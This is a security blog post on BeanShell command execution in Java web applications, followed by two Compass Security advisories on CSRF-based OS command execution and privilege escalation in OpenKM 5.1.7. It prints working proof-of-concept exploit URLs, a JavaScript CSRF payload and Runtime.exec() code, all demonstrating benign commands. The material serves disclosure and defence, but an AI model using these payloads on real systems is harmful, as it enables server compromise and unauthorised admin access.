BeanShell puts Java Application Servers at Risk

Developers increasingly integrate BeanShell support into web applications to provide end users and administrators with a simple extension framework. But be warned! BeanShell support without appropriate access control will put the hosting web server at severe risk. An attacker could easily execute operating system calls and without appropriate system hardening such an attack will immediately result in full system compromise.

The BeanShell[1] is an environment that provides execution of Java code snippets in the web application context. The shell supports full Java language syntax and some loose structures for convenience. Be aware, to run code within an Java Virtual Machine (JVM) means to run code on the server. The following screenshot shows BeanShell enabled web application that just run a hello world command.

However, to be able to do some meaningful attacks one must first overcome and understand some limitations of the Java Runtime.getRuntime().exec() method. Simply putting a whole command into the exec method will not run properly since Java will internally tokenize the String and redirect IO streams. The first argument will be taken as executable. All remaining tokens will be passed as parameters to the executable. Thus, the below statement will not work as intended because the “-c” parameter awaits a single argument.

Runtime.getRuntime().exec("/bin/sh -c /bin/echo pwned > /tmp/poc"};

Following that, command injection in Java is a difficult thing to do since the attacker mostly just gains control over the parameters. However, in BeanShell we are pretty free to choose from the whole arsenal of Java API classes and methods. Finally, a correct call would look like:

String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);

That way, Java will pass “/bin/echo pwned > /tmp/poc” correctly. Unfortunately, there is another limitation on the IO streams. Thus, to read and process the output of a command the InputStream classes will be needed. The following snippet is a working example with the Unix list directory (ls) command.

import java.io.*;

try {
    Process ls_proc = Runtime.getRuntime().exec(“/bin/ls -lah”);
    DataInputStream lsin = new DataInputStream(lsproc.getInputStream());
    String ls_str;

    while ((lsstr = lsin.readLine()) != null)
        print(ls_str + ” “);

} catch (IOException e) {
}

So, you might be asking yourself how this ex-course on the Runtime class’s exec method is related to BeanShell support in web applications?

I have published an advisory[3] on insufficient access control of an integrated BeanShell in an Enterprise Java (J2EE) based document management system software (OpenKM). An attacker could prepare en evil e-mail or website that runs a malicious command on the server if the OpenKM administrator clicks on the link or visits the prepared website.

For example, an attacker would simply embed the below JavaScript exploit code into a web page to cause writing a proof of concept file into the /tmp folder.

img = new Image();
img.src=”http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3BRuntime.getRuntime%28%29.exec%28cmd%29%3B”

Related vulnerabilities are often seen in administrative interfaces of web apps. The attack scheme is also known as Cross-site Request Forgery or XSRF[4]. There are several ways to approach the issue. Either ensure proper access controls[5] or lock down the JVM using Java security policies and the Security Manager[6]. In the end, system hardening may help limiting collateral damage in case of successful attacks.

References
[1] http://www.beanshell.org/
[2] http://www.ensta-paristech.fr/~diam/java/online/io/javazine.html
[3] http://www.csnc.ch/misc/files/advisories/COMPASS-2012-002openkmxsrfoscommand_execution.txt
[4] https://www.owasp.org/index.php/Cross-SiteRequestForgery_%28CSRF%29
[5] https://www.owasp.org/index.php/Cross-SiteRequestForgery%28CSRF%29PreventionCheatSheet
[6] http://docs.oracle.com/javase/7/docs/api/java/lang/RuntimePermission.html

Advertisement

OpenKM 5.1.7 OS Command Execution (XSRF based)

########################################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
########################################################################
#
# ID:      COMPASS-2012-002
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor:  OpenKM
# Subject: Cross-site Request Forgery based OS Command Execution
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date:    January 3rd 2012
#
#########################################################################

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing,
Switzerland discovered a web application issue based OS command execution flaw
in the OpenKM solution. OpenKM does allow administrative users (having the
AdminRole) to run bean shell scripts. Due to the flaw, an attacker could lure
an OpenKM administrator to a malicious web page that causes arbitrary OS
commands being run in the administrators OpenKM session context. This is
possible because OpenKM does not implement access control mechanisms to avoid
so called Cross-site Request Forgery [2] (a.k.a. CSRF, XSRF, session riding,
forceful browsing). The commands are being executed silently. In the end, this
allows an attacker to run OS commands with the privileges of the process owner
of the application server (JBOSS).

Vulnerable:
-----------
OpenKM 5.1.7 and most likely prior versions (unconfirmed)

Not vulnerable:
---------------
OpenKM version 5.1.8

Fix:
----
To avoid this issue the application must introduce Anti-XSRF tokens for the
web-based administrative interface. To avoid arbitrary command execution the
admin/scripting.jsp could be removed from the OpenKM.ear before the
application is being deployed. Note, the cron job functionality allows to run
*.jar and BeanShell scripts as well.

Exploit:
--------
Login as administrator (having the AdminRole) and call the URL in a different
browser window
http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3BRuntime.getRuntime%28%29.exec%28cmd%29%3B

Alternatively the administrator could browse a prepared HTML page in a new tab



img = new Image();
img.src="http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"




The above exploit does nothing else than just creating a file in /tmp

String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);

Some might also want to browse directories
http://example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3Btry+%7B++++String+ls_str%3B++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%7D+catch+%28IOException+e%29+%7B%7D

import java.io.*;

try {
    String ls_str;
    Process ls_proc = Runtime.getRuntime().exec("/bin/ls -lah");
    DataInputStream ls_in = new DataInputStream(ls_proc.getInputStream());

    while ((ls_str = ls_in.readLine()) != null)
        print(ls_str + "
");

} catch (IOException e) {
}

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com
is an Free/Libre document management system that provides a web interface for
managing arbitrary files. OpenKM includes a content repository, Lucene
indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Cross-site Request Forgery https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little help
of social engineering (like sending a link via email/chat), an attacker may
force the users of a web application to execute actions of the attacker's
choosing. A successful CSRF exploit can compromise end user data and operation
in case of normal user. If the targeted end user is the administrator account,
this can compromise the entire web application.

OpenKM 5.1.7 Privilege Escalation

#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#############################################################
#
# ID:      COMPASS-2012-001
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor:  OpenKM
# Subject: Privilege Escalation, Improper Access Control
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date:    January 3rd 2012
#
#############################################################

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing,
Switzerland discovered an authorization flaw in the OpenKM solution. OpenKM
does allow application administrators to manage users and to assign roles.
Unfortunately, a standard user having the UserRole may alter the roles of
existing account. This is possible because OpenKM does not properly check
for the sufficient privileges. The changes are being applied even though the
OpenKM user interface displays an "insufficient privileges" message to the
unprivileged user.

Vulnerable:
-----------
OpenKM version 5.1.7 and most likely prior versions (unconfirmed)

Not vulnerable:
---------------
OpenKM version 5.1.8.

Workaround:
-----------
Grant access to /OpenKM/admin path to specific IPs only (requires additional
WAF or Reverse Proxy setup[2])

Exploit:
--------
Login as low privileged User (having the UserRole) and call the following
URL to gain administrative privileges.

Upgrade Existing User (add AdminRole)
http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id=usr&usr_active=on&usr_roles=AdminRole

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com
is an Free/Libre document management system that provides a web interface for
managing arbitrary files. OpenKM includes a content repository, Lucene
indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Open Source Web Entry Server
Talk at OWASP Appsec Washington D.C. in November 2010 about setting up an
Apache based Open Source Web Entry Server
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_V2.2.ppt